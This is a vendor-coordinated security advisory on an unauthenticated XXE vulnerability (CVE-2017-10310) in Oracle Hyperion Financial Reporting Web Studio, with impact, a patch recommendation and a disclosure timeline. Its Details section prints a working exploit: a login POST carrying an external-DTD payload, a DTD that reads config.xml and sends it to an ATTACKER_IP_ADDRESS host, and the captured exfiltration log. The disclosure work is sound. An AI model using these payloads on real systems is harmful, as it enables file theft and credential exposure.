Unauthenticated XML eXternal Entity (XXE) vulnerability
Vendor: Oracle Vendor URL: http://www.oracle.com/ Versions affected: 11.1.2.4 (previous versions may also be affected) Systems Affected: Oracle Hyperion Financial Reporting Web Studio Author: Mathew Nash Mathew.Nash[at]nccgroup[dot]trust, Fabio Pires Fabio.pires[at]nccgroup[dot]trust Advisory URL: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html CVE Identifier: CVE-2017-10310 Risk: High (Unauthenticated local file read, server-side request forgery or denial of service)
Summary
The XML parser of the Oracle Hyperion Financial Reporting Web Studio is configured to process a document type definition (DTD) provided by users. This allows unauthenticated attackers to exploit this misconfiguration in the XML processor and read arbitrary files on the host system. In addition, it is also possible to obtain directory listings, perform server-side requests or cause a denial of service by using different variations of the payload.
Location
A vulnerable endpoint was found in the log in page of the Oracle Hyperion Financial Reporting Web Studio.
Impact
The confidentially of the system can be highly affected. As this is a POST request against the log in endpoint, most servers may not be configured to perform logging of the POST data; also, as this is an unauthenticated attack, it would be hard to find evidence of this attack occurring and the information obtained via successful exploitation.
Details
The following POST request shows an example of how the vulnerability might be exploited:
Request: POST /frdesigner/faces/login?_adf.ctrl-state=9p4b9h3ea_4 HTTP/1.1 Host: <application host> User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 394 pt_sf1_domainIpTxt= pt_sf1:userIpTxt=AAAAAAAAAAAAAA pt_sf1:passwdIpTxt=AAAAAAAAAAAAAA pt_sf1:soc1=29 it1= ins1=1 ic1= iclov1= org.apache.myfaces.trinidad.faces.FORM=f1 javax.faces.ViewState=!1191fgdbmc event=pt_sf1:authBtn event.pt_sf1:authBtn=<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER_IP_ADDRESS/xxe_file"> %pe; %param1; %external;]><m ><k v="type"><s>action</s></k></m>
Before submitting the request, a DTD identified by the name ‘xxe_file’ can created in the attacker’s machine with the content below:
<!ENTITY % payload SYSTEM "file:///d:OracleMiddlewareuser_projectsdomainsEPMSystemconfigconfig.xml"> <!ENTITY % param1 "<!ENTITY #x25; external SYSTEM 'http://ATTACKERS_IP_ADDRESS/log_xxe?data=%payload;'>">
After the request is submitted, a connection from the server is seen to be made against the ATTACKER_IP_ADDRESS providing the content of the ‘config.xml’ in the query string of the request, as evidenced below:
$ python –m SimpleHTTPserver 80 [server_ip] - - [30/Mar/2017 15:27:23] "GET /log_xxe?data=<domain xmlns_sec="http://xmlns.oracle.com/weblogic/security" xmlns_wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance" xsi_schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd"> <name>EPMSystem</name> <domain-version>10.3.6.0</domain-version> <security-configuration> <name>EPMSystem</name> <realm> <sec:authentication-provider xsi_type="wls:default-authenticatorType"> <wls:use-retrieved-user-name-as-principal>true</wls:use-retrieved-user-name-as-principal> </sec:authentication-provider> <redacted> <pas:min-password-length>8</pas:min-password-length> <pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters> </sec:password-validator> </realm> <default-realm>myrealm</default-realm> <credential-encrypted>{AES}(REDACTED)</credential-encrypted> <node-manager-username>(REDACTED)</node-manager-username> <node-manager-password-encrypted>{AES}(REDACTED)</node-manager-password-encrypted> <enforce-valid-basic-auth-credentials>false</enforce-valid-basic-auth-credentials> </security-configuration>
It is also possible to list files and directories located in the local filesystem by changing the value of the entity ‘payload’ to a path similar to the below:
<!ENTITY % payload SYSTEM "file:///d:OracleMiddlewareuser_projectsdomainsEPMSystem">
Recommendation
Oracle have released a patch for this vulnerability which should be applied:
The implementation of the XML processor should be reviewed and consideration should be given to disabling entity definition parsing. The application should be reconfigured so it does not allow users to inject arbitrary code in the XML document’s preamble. The XML processor should also be configured to use a local static DTD and disallow any declared DTD included in the XML document.
Vendor communication
Advisory reported to Oracle: 31/03/2017 Oracle acknowledgement: 04/03/2017 Oracle requested more details: 06/04/2017 Details provided: 07/04/2017 Oracle status report (Issue fixed in main codeline): 25/04/2017 Patch released: 17/10/2017
About NCC Group
NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the internet safer and revolutionising the way in which organisations think about cyber security.
Written by: Fabio Pires